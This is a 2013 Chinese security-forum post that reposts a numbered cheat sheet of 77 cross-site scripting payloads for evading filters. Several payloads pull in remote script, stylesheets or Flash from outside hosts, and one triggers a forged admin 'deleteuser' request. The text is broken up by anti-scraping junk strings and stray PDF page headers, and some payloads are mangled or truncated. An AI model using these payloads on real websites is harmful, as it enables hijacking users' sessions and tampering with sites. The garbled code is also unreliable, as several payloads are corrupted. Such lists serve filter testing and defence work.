中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
, [7 z' W+ s8 {) t
(1)普通的XSS JavaScript注入
1 |! \; l3 y7 }/ ^( S0 I
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) y# U |" R, [0 h2 U( e
(2)IMG标签XSS使用JavaScript命令
7 H6 c0 |6 o" U$ o K1 T
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ O ^/ W2 j" @* @8 w2 b$ }( R h
(3)IMG标签无分号无引号
2 ]0 Q% ^' G L/ c4 D
<IMG SRC=javascript:alert(‘XSS’)>
1 K4 ^$ T9 A R+ D) ^! h
(4)IMG标签大小写不敏感
4 B. z2 j" @; S: ^5 t4 E
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
! y5 T0 M4 ?& [8 c: d0 ~
(5)HTML编码(必须有分号)
{% C; ~. H2 N# B2 `3 a0 ]
<IMG SRC=javascript:alert(“XSS”)>
, c0 ~2 S2 S6 C+ n/ V) K
(6)修正缺陷IMG标签
9 X# p- @7 w5 h1 N, |
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, S; b9 Q9 `% R0 [2 c1 v
' ^; x) J: `8 o9 h
% R2 h" N( o- \! [: j
(7)formCharCode标签(计算器)
1 J9 ^7 p5 k7 }/ D* h
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
( H; S0 z* l' ^0 K- _3 w* W. c- q
(8)UTF-8的Unicode编码(计算器)
/ ?% z, `# E, r% }8 V" s' ?9 n0 c
<IMG SRC=jav..省略..S')>
% R& v+ ]5 i e: {1 b* `# p
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
7 l3 m7 S @# C8 x
<IMG SRC=jav..省略..S')>
" q; |7 b9 W+ U r0 k1 `
(10)十六进制编码也是没有分号(计算器)
~2 g* `( w6 C9 L% ]1 ?& X
<IMG SRC=java..省略..XSS')>
/ j' z) e) S! ^$ u* `" q
(11)嵌入式标签,将Javascript分开
o7 F3 |- G: E3 H$ S9 }
<IMG SRC=”jav ascript:alert(‘XSS’);”>
, W2 }& p- @. E- j; J) Y
(12)嵌入式编码标签,将Javascript分开
( K: C# J, E8 G& P
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 a$ H" G6 C6 e5 U) U# R
(13)嵌入式换行符
/ D" {+ y0 p! d
<IMG SRC=”jav ascript:alert(‘XSS’);”>
3 S/ H2 m# F% T
(14)嵌入式回车
5 J) \/ M) `6 a
<IMG SRC=”jav ascript:alert(‘XSS’);”>
R% d! c( @ Y4 a: [! v1 A# T
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
: Q2 H; V2 F3 C3 ?
<IMG SRC=”javascript:alert(‘XSS‘)”>
$ P' f3 s+ H% W: Y
(16)解决限制字符(要求同页面)
+ F* u, w( U2 Q/ c, o
<script>z=’document.’</script>
+ u* Z0 F5 R/ {+ i. g$ O
<script>z=z+’write(“‘</script>
R, |, ]8 _* H: R5 M4 O
<script>z=z+’<script’</script>
0 [1 a9 X5 u3 ?0 O( X
<script>z=z+’ src=ht’</script>
0 T8 q0 z! b8 v
<script>z=z+’tp://ww’</script>
1 b% Q! R. c' k& Z5 f. a* \
<script>z=z+’w.shell’</script>
- J& h) V) Z5 a' h3 i5 M0 r
<script>z=z+’.net/1.’</script>
; i3 \$ T6 H7 a R, C& L
<script>z=z+’js></sc’</script>
' Y! ]- F4 b! }6 L
<script>z=z+’ript>”)’</script>
7 [' f( I. p4 k- m" @
<script>eval_r(z)</script>
6 U" r6 H6 `$ U3 j! n" _
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
9 J/ \7 S+ G. r% w- O0 Z
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
- r& w1 I0 {( x
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 C4 f% w% C$ W( u% r+ u* l% b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
" t- K- A' R; p6 Q! e+ h
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
V1 F. ~1 y- G% q" L$ j+ ]
(19)Spaces和meta前的IMG标签
+ C5 u5 k& k% L5 F
<IMG SRC=” javascript:alert(‘XSS’);”>
$ q1 j5 J. |8 ?4 v7 x9 k
(20)Non-alpha-non-digit XSS
, i* m' T& w2 E7 ^+ e
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
* w. a8 r9 O5 [: z- p& ^
(21)Non-alpha-non-digit XSS to 2
+ w: Y# q' i- g1 z7 F
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) J0 c, e+ M9 s$ x e. `
(22)Non-alpha-non-digit XSS to 3
% S2 R- W! G# V; {3 Z+ i' d/ `; i
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
; {2 l) P- l( C7 {$ i( K& q- e1 H
(23)双开括号
+ I, q3 O( V" U) _2 d
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ q( _/ |1 G* \0 @
(24)无结束脚本标记(仅火狐等浏览器)
! A& B8 A. \) `5 n
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
) x2 C$ \5 {( {3 B
(25)无结束脚本标记2
. j. i9 ^0 U5 {7 U
<SCRIPT SRC=//3w.org/XSS/xss.js>
+ {% |0 b- X9 r1 P7 H: g
(26)半开的HTML/JavaScript XSS
" O" D% H3 F5 q. Z! ?. s. D" g" |
<IMG SRC=”javascript:alert(‘XSS’)”
2 y m/ Q! U( c& |0 o
(27)双开角括号
' [9 S6 }# T2 g$ Q! L
<iframe src=http://3w.org/XSS.html <
- N3 c2 w5 K+ }" Y
(28)无单引号 双引号 分号
- p" G+ P! g) O5 s v
<SCRIPT>a=/XSS/
{* J& n: h& ~$ t9 |3 l, r
alert(a.source)</SCRIPT>
. M# C- T7 m9 Y4 o; I
(29)换码过滤的JavaScript
) {9 C6 v {8 \3 `( @, @
\”;alert(‘XSS’);//
6 O. |- O8 X# u6 Q
(30)结束Title标签
2 l' S4 |6 ? O* S
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
: ~* G/ m* ]" N; g" y& G( c
(31)Input Image
0 x0 d$ F: a3 U- K. F% a7 ]
<INPUT SRC=”javascript:alert(‘XSS’);”>
/ W' q: Q1 V3 {8 H0 ]
(32)BODY Image
: e+ }, R1 D6 P. ^
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
' o. `# Z0 v) G& I& A
(33)BODY标签
" v5 \3 F$ T# Z1 v$ z F
<BODY(‘XSS’)>
( Q& I9 ~6 {( V# j4 w
(34)IMG Dynsrc
/ y! o! W, t% h h8 X! I0 `
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
0 w4 P: M8 J9 Z" t i
(35)IMG Lowsrc
( @* B: g' e) }6 Q" B
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
0 Y% L3 Z/ {6 O2 Q
(36)BGSOUND
1 N8 f$ H" w+ B* `3 B
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
% l8 t9 }5 R. X
(37)STYLE sheet
8 \) _4 N: t9 M0 _7 d$ x) R$ _
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
6 W5 M. F$ T9 N0 z. c
(38)远程样式表
+ I+ x# X7 u2 t/ U
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
2 ?$ L8 |2 i% n8 j
(39)List-style-image(列表式)
, _" \, g5 L5 ], \
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 a) {* y+ f6 p! T X. P$ y: {
(40)IMG VBscript
1 s6 A0 l+ @$ h0 o- y. N# d0 X
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 d+ T9 g6 _: u7 Q0 w
(41)META链接url
. r2 Q! e- g. B7 I& @& z
6 L+ d7 {# ?' Q3 O& B
/ d. }% S; ^2 v9 A, @6 A
<META HTTP-EQUIV=”refresh” CONTENT=”0;
( c% Q0 `: [- a; k
URL=http://;URL=javascript:alert(‘XSS’);”>
8 H$ R" T0 }4 |" \9 G
(42)Iframe
& e% E# j, ?* b& `: |
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
$ @8 r* b, N: M2 G( H3 O
(43)Frame
2 W2 P# J" O, [+ w9 |( ]
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
% o& z% Q* |; l- d, h/ I
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
3 k; J" }0 m8 C# P! Z r
(44)Table
' L) J9 b Q% `/ M4 e. N. `
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
| n+ x) R; |4 X$ U3 {
(45)TD
9 D4 a0 W; d' M+ `6 E
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
X8 e/ Z. B/ o+ q
(46)DIV background-image
1 f' o0 _' u! y- B3 J! W. e/ T
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. H% r& `6 S/ I) ~$ w# |) e
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
5 ^. p) P' ?( l* H& m+ c
8&13&12288&65279)
# f$ M( m3 K$ O
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! ^7 M4 K% I# `% Q1 \, d5 S2 a: a
(48)DIV expression
( U3 U0 L8 Y" p; G
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
' ?, A! f8 w: r1 Y; D
(49)STYLE属性分拆表达
: p$ O- V( O0 n; F6 P
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ B3 s7 b; {! G$ E' c8 F- _
(50)匿名STYLE(组成:开角号和一个字母开头)
( F8 G5 H4 W7 r2 ~2 o9 F2 ^3 j" H
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
) \' {2 N% z* f' j9 l7 e
(51)STYLE background-image
" k4 C- g# s' k
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
5 I) E, h0 F% A) t
CLASS=XSS></A>
; U2 h2 | ]# w2 J5 O: ^
(52)IMG STYLE方式
6 ?: J6 b* p6 y. o& Y4 O+ Z
exppression(alert(“XSS”))’>
2 c! f( H" l% t0 v/ B
(53)STYLE background
. y0 q3 h* e* S$ ]+ n7 n. ^
<STYLE><STYLE
5 P( K/ x$ ~! M1 _# ^
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
9 J5 [3 l. K" O# f3 ^
(54)BASE
: y" `3 i k, E6 t# R$ J
<BASE HREF=”javascript:alert(‘XSS’);//”>
4 J5 Z4 P+ H5 D3 @+ ^( ^+ b* _. T
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
: r M& e% R% l3 n1 _3 i# {
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
1 g1 j/ u4 d# J. H
(56)在flash中使用ActionScrpt可以混进你XSS的代码
9 c% L, G* C# w
a=”get”;
2 H- b$ `, K, _; x' J2 `
b=”URL(\”";
. @& Z& ^$ J( e
c=”javascript:”;
6 N4 g/ P# y$ l. i2 u0 M& p# p
d=”alert(‘XSS’);\”)”;
5 G5 [4 a$ B8 ]* `5 ~
eval_r(a+b+c+d);
5 W9 B# T" E9 B0 G- Z
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
; \( K" l% A0 G4 w
<HTML xmlns:xss>
5 j7 |1 Q4 ^1 h: ^/ t( r
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
5 P, a4 x0 ]: f5 |1 j S$ ~, ~& g' b
<xss:xss>XSS</xss:xss>
( U7 ~; G1 Q$ {6 [+ V! z: i
</HTML>
* c7 i6 G/ E' f. t C( i; n( w
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- V2 B) v' ~( O2 x
<SCRIPT SRC=””></SCRIPT>
6 ?& d! @" B$ V% @
(59)IMG嵌入式命令,可执行任意命令
$ B# x L' q8 ]6 O
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
. Y/ U' x6 K, @: P! i# Q+ f# _- l" |
(60)IMG嵌入式命令(a.jpg在同服务器)
8 v: E2 [9 C) t: o: V# L
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
# F& Y) {5 T r
(61)绕符号过滤
' q1 [7 j8 ~3 t+ V* z5 h
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
" H0 x( ~( Q& J" C1 C
(62)
/ E$ {% F3 C8 ?! x5 T' h
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
/ i: r4 R5 B0 Z) i5 V
(63)
/ z, ]6 x5 a# g1 `$ g' F8 K0 t
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
* K# |! [ Q1 d
(64)
+ x2 K# j5 x# I% W) ?% ]6 F
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
# _8 C0 X J0 B. @
(65)
2 t5 ^# t; X3 I3 z
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
- \9 R X. _' n. n
(66)12-7-1 T00LS - Powered by Discuz! Board
" w2 n @, s$ d" Z3 D0 M0 ~5 Z& Z
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
% u( n4 W7 I& Y4 ~! T' T
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
( `6 T) |7 u7 q' m9 R, M5 k8 u/ K% W
(67)
. w! F1 t& l( ?1 y) [8 K8 ^( {
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
8 `+ j" z" S% ~% _
</SCRIPT>
: G9 E$ _& W1 t- O! M' a0 d( W
(68)URL绕行
& C0 x" p+ S8 |, F% O- `
<A HREF=”
http://127.0.0.1/
”>XSS</A>
% d4 H6 o6 _) t5 u2 k; C, a
(69)URL编码
0 Z5 f7 c9 h0 N! \) o) |+ q% B
<A HREF=”
http://3w.org
”>XSS</A>
( \6 E& r% Y. x5 [6 u5 p" R
(70)IP十进制
$ T0 U3 V" o- l7 Z0 s/ U
<A HREF=”http://3232235521″>XSS</A>
1 p2 I N3 r8 j- r/ h
(71)IP十六进制
' C" ?/ S7 K: o! q5 G) p+ x* {
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
, B% W" Y2 b- }7 S
(72)IP八进制
1 w; u# a; u1 {8 Y2 ?( P
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
& R9 _8 w: q; r9 b! v! v% F" ^
(73)混合编码
3 u- @: p: [8 n( X0 R
<A HREF=”h
% E4 F, o t$ D s, |6 s
tt p://6 6.000146.0×7.147/”">XSS</A>
2 O0 J! J! j5 ^, o p6 F5 `; O0 t7 \
(74)节省[http:]
6 b* g" ?" d/ D% f! `8 X3 ^
<A HREF=”//www.google.com/”>XSS</A>
' Q$ V/ v2 X/ n3 d; C( t M
(75)节省[www]
m7 K2 X: |6 s6 _, O% I; r6 p0 J
<A HREF=”
http://google.com/
”>XSS</A>
e1 s. L F7 T9 m5 t; t$ w0 m" b
(76)绝对点绝对DNS
% B P: |5 l I' @2 P
<A HREF=”
http://www.google.com./
”>XSS</A>
" z8 m8 z- b. `
(77)javascript链接
o) e9 n4 J" K! H* j7 N
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
- v1 y% B* {0 C8 D
5 o( ~6 j V6 \5 I
原文地址:
http://fuzzexp.org/u/0day/?p=14
# k0 A" R9 B9 U' N7 `* |; R* `
- S0 V1 Z( _8 i4 j# I5 V* Z+ G
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2